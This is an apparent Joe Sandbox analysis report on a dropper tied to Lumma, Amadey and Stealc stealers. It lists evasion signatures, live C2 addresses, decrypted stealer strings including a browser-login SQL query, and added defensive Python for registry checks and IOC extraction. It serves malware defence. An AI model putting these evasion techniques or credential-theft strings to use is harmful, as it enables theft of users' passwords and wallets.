Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1545816
MD5: 7bd9ddf41cf8c2451e6e75242febfda1
SHA1: 94af38e810957befdd50512626f3aab2d1864598
SHA256: 97fd020744b762f6103a7712a182af2161557bae49cae9772c2a9b5ebad82513
Tags: exe, user-Bitsight

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey's stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SIDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer
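Several of the signatures above (autostart keys pointing into a Temp folder, Defender real-time protection and notifications disabled through the registry) are things a responder can hunt for directly in a registry export. The Python below is an added example and is not part of this report or of Joe Sandbox: it parses a constructed `reg export` excerpt and flags both conditions. The Run value's image path follows the Amadey config extracted further down (Install Folder "abc3bc1985", Install File "skotes.exe" under the user's Temp directory); the Defender value names are assumptions, since the report only says those settings were changed via registry and does not list the values.

```python
import re

# Constructed `reg export` excerpt (example data, not taken from the report).
# The "skotes" path mirrors the Amadey install path seen in this analysis; the
# Defender policy values are an assumption about which values were touched.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"skotes"="C:\\Users\\user\\AppData\\Local\\Temp\\abc3bc1985\\skotes.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection]
"DisableRealtimeMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration]
"Notification_Suppress"=dword:00000001
'''

# Folders a Run-key image path should not live in (the kind of locations the
# Sigma rule "New RUN Key Pointing to Suspicious Folder" is built around).
SUSPICIOUS_DIRS = (
    "\\appdata\\local\\temp\\",
    "\\windows\\temp\\",
    "\\users\\public\\",
    "\\$recycle.bin\\",
    "\\perflogs\\",
)
AUTOSTART_KEY_SUFFIXES = (
    "\\microsoft\\windows\\currentversion\\run",
    "\\microsoft\\windows\\currentversion\\runonce",
)
# (key leaf name, value name) -> value that indicates Defender was tampered with
DEFENDER_TAMPER_VALUES = {
    ("real-time protection", "disablerealtimemonitoring"): 1,
    ("ux configuration", "notification_suppress"): 1,
}

_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def parse_reg_export(text):
    """Yield (key, value_name, value) triples from .reg export text."""
    key = None
    for raw_line in text.splitlines():
        line = raw_line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = _VALUE_RE.match(line) if key else None
        if not m:
            continue
        name, raw = m.group(1), m.group(2)
        if raw.startswith("dword:"):
            value = int(raw[len("dword:"):], 16)
        elif len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
            # .reg escapes backslashes and quotes inside string values
            value = raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
        else:
            value = raw
        yield key, name, value


def image_path(command):
    """Strip arguments from a Run value: quoted path if quoted, else first token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def find_suspicious_autostarts(text):
    findings = []
    for key, name, value in parse_reg_export(text):
        if not key.lower().endswith(AUTOSTART_KEY_SUFFIXES) or not isinstance(value, str):
            continue
        path = image_path(value)
        if any(d in path.lower() for d in SUSPICIOUS_DIRS):
            findings.append({"key": key, "name": name, "image_path": path})
    return findings


def find_defender_tampering(text):
    findings = []
    for key, name, value in parse_reg_export(text):
        leaf = key.rsplit("\\", 1)[-1].lower()
        expected = DEFENDER_TAMPER_VALUES.get((leaf, name.lower()))
        if expected is not None and value == expected:
            findings.append({"key": key, "name": name, "value": value})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_autostarts(SAMPLE_REG_EXPORT):
        print("autostart in suspicious folder:", f)
    for f in find_defender_tampering(SAMPLE_REG_EXPORT):
        print("defender tampering:", f)
```

On a live host the same logic applies to the output of `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and the two Defender policy keys; the OneDrive entry in the sample is there to show that a legitimate AppData path outside Temp is not flagged.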

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000004.00000002.1946832633.0000000000471000.00000040.00000001.01000000.0000000C.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 28.2.num.exe.e80000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: 6cadd3f0fd.exe.7516.9.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["fadehairucw.store", "thumbystriw.store", "scriptyprefej.store", "founpiuer.store", "crisiwarny.store", "presticitpo.store", "navygenerayk.store", "necklacedmny.store"], "Build id": "4SD0y4--legendaryy"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe ReversingLabs: Detection: 95%
Source: file.exe ReversingLabs: Detection: 39%
Source: file.exe Virustotal: Detection: 52%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5TAVJ2XDPW30B3ZI4A9E75FX93.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
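The three "Malware Configuration Extractor" lines above are the most directly actionable part of the report: they give the Amadey, Stealc and Lumma C2 endpoints and the Amadey install location. As an added example (not part of the report or of any of the tools it names), the Python below takes those three lines verbatim as input, normalises the C2 entries (the Amadey and Lumma values omit the URL scheme) into IP and domain indicators, derives the Amadey on-disk path from Install Folder and Install File, and defangs the network indicators for sharing.

```python
import ipaddress
import json
import re
from urllib.parse import urlsplit

# The three configuration-extractor lines from this report, copied verbatim.
REPORT_LINES = r"""
Source: 00000004.00000002.1946832633.0000000000471000.00000040.00000001.01000000.0000000C.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 28.2.num.exe.e80000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: 6cadd3f0fd.exe.7516.9.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["fadehairucw.store", "thumbystriw.store", "scriptyprefej.store", "founpiuer.store", "crisiwarny.store", "presticitpo.store", "navygenerayk.store", "necklacedmny.store"], "Build id": "4SD0y4--legendaryy"}
"""

CONFIG_RE = re.compile(
    r"^Source: (?P<source>\S+) Malware Configuration Extractor: "
    r"(?P<family>\w+) (?P<json>\{.*\})$"
)


def parse_config_lines(text):
    """Return [{source, family, config}] for every extractor line that carries valid JSON."""
    configs = []
    for line in text.splitlines():
        m = CONFIG_RE.match(line.strip())
        if not m:
            continue
        try:
            cfg = json.loads(m.group("json"))
        except json.JSONDecodeError:
            continue  # truncated extractor output: skip rather than guess
        configs.append({"source": m.group("source"), "family": m.group("family"), "config": cfg})
    return configs


def _as_list(v):
    return v if isinstance(v, list) else [v]


def c2_iocs(configs):
    """Normalise every C2 entry to a host indicator, typed as ip or domain."""
    iocs, seen = [], set()
    for c in configs:
        for entry in _as_list(c["config"].get("C2 url", [])):
            url = entry if "://" in entry else "http://" + entry  # Amadey/Lumma omit the scheme
            host = urlsplit(url).hostname
            if not host:
                continue
            try:
                ipaddress.ip_address(host)
                kind = "ip"
            except ValueError:
                kind = "domain"
            key = (kind, host, url)
            if key in seen:
                continue
            seen.add(key)
            iocs.append({"type": kind, "value": host, "url": url, "family": c["family"]})
    return iocs


def host_iocs(configs):
    """File-system artefacts implied by the config. Amadey writes itself to
    <Temp>\\<Install Folder>\\<Install File>, which is exactly the dropped-file
    path C:\\Users\\user\\AppData\\Local\\Temp\\abc3bc1985\\skotes.exe in this report."""
    out = []
    for c in configs:
        cfg = c["config"]
        if "Install Folder" in cfg and "Install File" in cfg:
            path = "%TEMP%\\" + cfg["Install Folder"] + "\\" + cfg["Install File"]
            out.append({"type": "path", "value": path, "family": c["family"]})
    return out


def defang(s):
    """Make a URL/host safe to paste into tickets and chat."""
    return s.replace("http", "hxxp").replace(".", "[.]")


if __name__ == "__main__":
    cfgs = parse_config_lines(REPORT_LINES)
    for i in c2_iocs(cfgs):
        print(i["family"], i["type"], defang(i["url"]))
    for i in host_iocs(cfgs):
        print(i["family"], i["type"], i["value"])
```

The same parser works on the full text export of any Joe Sandbox report, since the extractor always emits the `Source: ... Malware Configuration Extractor: <family> {json}` shape; families whose config uses a different key than "C2 url" simply contribute no network indicators.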
Source: 28.2.num.exe.e80000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 28.2.num.exe.e80000.0.unpack String decryptor: 30
Source: 28.2.num.exe.e80000.0.unpack String decryptor: 11
Source: 28.2.num.exe.e80000.0.unpack String decryptor: 20
Source: 28.2.num.exe.e80000.0.unpack String decryptor: 24
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetProcAddress
Source: 28.2.num.exe.e80000.0.unpack String decryptor: LoadLibraryA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: lstrcatA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: OpenEventA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CreateEventA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CloseHandle
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Sleep
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetUserDefaultLangID
Source: 28.2.num.exe.e80000.0.unpack String decryptor: VirtualAllocExNuma
Source: 28.2.num.exe.e80000.0.unpack String decryptor: VirtualFree
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetSystemInfo
Source: 28.2.num.exe.e80000.0.unpack String decryptor: VirtualAlloc
Source: 28.2.num.exe.e80000.0.unpack String decryptor: HeapAlloc
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetComputerNameA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: lstrcpyA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetProcessHeap
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetCurrentProcess
Source: 28.2.num.exe.e80000.0.unpack String decryptor: lstrlenA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ExitProcess
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetSystemTime
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SystemTimeToFileTime
Source: 28.2.num.exe.e80000.0.unpack String decryptor: advapi32.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: gdi32.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: user32.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: crypt32.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ntdll.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetUserNameA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CreateDCA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetDeviceCaps
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ReleaseDC
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CryptStringToBinaryA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sscanf
Source: 28.2.num.exe.e80000.0.unpack String decryptor: VMwareVMware
Source: 28.2.num.exe.e80000.0.unpack String decryptor: HAL9TH
Source: 28.2.num.exe.e80000.0.unpack String decryptor: JohnDoe
Source: 28.2.num.exe.e80000.0.unpack String decryptor: DISPLAY
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %hu/%hu/%hu
Source: 28.2.num.exe.e80000.0.unpack String decryptor: http://185.215.113.206
Source: 28.2.num.exe.e80000.0.unpack String decryptor: bksvnsj
Source: 28.2.num.exe.e80000.0.unpack String decryptor: /6c4adf523b719729.php
Source: 28.2.num.exe.e80000.0.unpack String decryptor: /746f34465cf17784/
Source: 28.2.num.exe.e80000.0.unpack String decryptor: tale
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetFileAttributesA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GlobalLock
Source: 28.2.num.exe.e80000.0.unpack String decryptor: HeapFree
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetFileSize
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GlobalSize
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 28.2.num.exe.e80000.0.unpack String decryptor: IsWow64Process
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Process32Next
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetLocalTime
Source: 28.2.num.exe.e80000.0.unpack String decryptor: FreeLibrary
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetTimeZoneInformation
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetSystemPowerStatus
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetVolumeInformationA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Process32First
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetLocaleInfoA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetModuleFileNameA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: DeleteFileA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: FindNextFileA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: LocalFree
Source: 28.2.num.exe.e80000.0.unpack String decryptor: FindClose
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: LocalAlloc
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetFileSizeEx
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ReadFile
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SetFilePointer
Source: 28.2.num.exe.e80000.0.unpack String decryptor: WriteFile
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CreateFileA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: FindFirstFileA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CopyFileA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: VirtualProtect
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetLastError
Source: 28.2.num.exe.e80000.0.unpack String decryptor: lstrcpynA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: MultiByteToWideChar
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GlobalFree
Source: 28.2.num.exe.e80000.0.unpack String decryptor: WideCharToMultiByte
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GlobalAlloc
Source: 28.2.num.exe.e80000.0.unpack String decryptor: OpenProcess
Source: 28.2.num.exe.e80000.0.unpack String decryptor: TerminateProcess
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetCurrentProcessId
Source: 28.2.num.exe.e80000.0.unpack String decryptor: gdiplus.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ole32.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: bcrypt.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: wininet.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: shlwapi.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: shell32.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: psapi.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: rstrtmgr.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SelectObject
Source: 28.2.num.exe.e80000.0.unpack String decryptor: BitBlt
Source: 28.2.num.exe.e80000.0.unpack String decryptor: DeleteObject
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CreateCompatibleDC
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GdipGetImageEncoders
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GdiplusStartup
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GdiplusShutdown
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GdipSaveImageToStream
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GdipDisposeImage
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GdipFree
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetHGlobalFromStream
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CoUninitialize
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CoInitialize
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CoCreateInstance
Source: 28.2.num.exe.e80000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 28.2.num.exe.e80000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 28.2.num.exe.e80000.0.unpack String decryptor: BCryptDecrypt
Source: 28.2.num.exe.e80000.0.unpack String decryptor: BCryptSetProperty
Source: 28.2.num.exe.e80000.0.unpack String decryptor: BCryptDestroyKey
Source: 28.2.num.exe.e80000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetWindowRect
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetDesktopWindow
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetDC
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CloseWindow
Source: 28.2.num.exe.e80000.0.unpack String decryptor: wsprintfA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CharToOemW
Source: 28.2.num.exe.e80000.0.unpack String decryptor: wsprintfW
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RegQueryValueExA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RegEnumKeyExA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RegOpenKeyExA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RegCloseKey
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RegEnumValueA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CryptBinaryToStringA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CryptUnprotectData
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SHGetFolderPathA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ShellExecuteExA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: InternetOpenUrlA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: InternetConnectA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: InternetCloseHandle
Source: 28.2.num.exe.e80000.0.unpack String decryptor: InternetOpenA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: HttpSendRequestA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: HttpOpenRequestA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: InternetReadFile
Source: 28.2.num.exe.e80000.0.unpack String decryptor: InternetCrackUrlA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: StrCmpCA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: StrStrA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: StrCmpCW
Source: 28.2.num.exe.e80000.0.unpack String decryptor: PathMatchSpecA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetModuleFileNameExA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RmStartSession
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RmRegisterResources
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RmGetList
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RmEndSession
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3_open
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3_step
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3_column_text
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3_finalize
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3_close
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3_column_bytes
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3_column_blob
Source: 28.2.num.exe.e80000.0.unpack String decryptor: encrypted_key
Source: 28.2.num.exe.e80000.0.unpack String decryptor: PATH
Source: 28.2.num.exe.e80000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: NSS_Init
Source: 28.2.num.exe.e80000.0.unpack String decryptor: NSS_Shutdown
Source: 28.2.num.exe.e80000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 28.2.num.exe.e80000.0.unpack String decryptor: PK11_FreeSlot
Source: 28.2.num.exe.e80000.0.unpack String decryptor: PK11_Authenticate
Source: 28.2.num.exe.e80000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 28.2.num.exe.e80000.0.unpack String decryptor: C:\ProgramData\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 28.2.num.exe.e80000.0.unpack String decryptor: browser:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: profile:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: url:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: login:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: password:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Opera
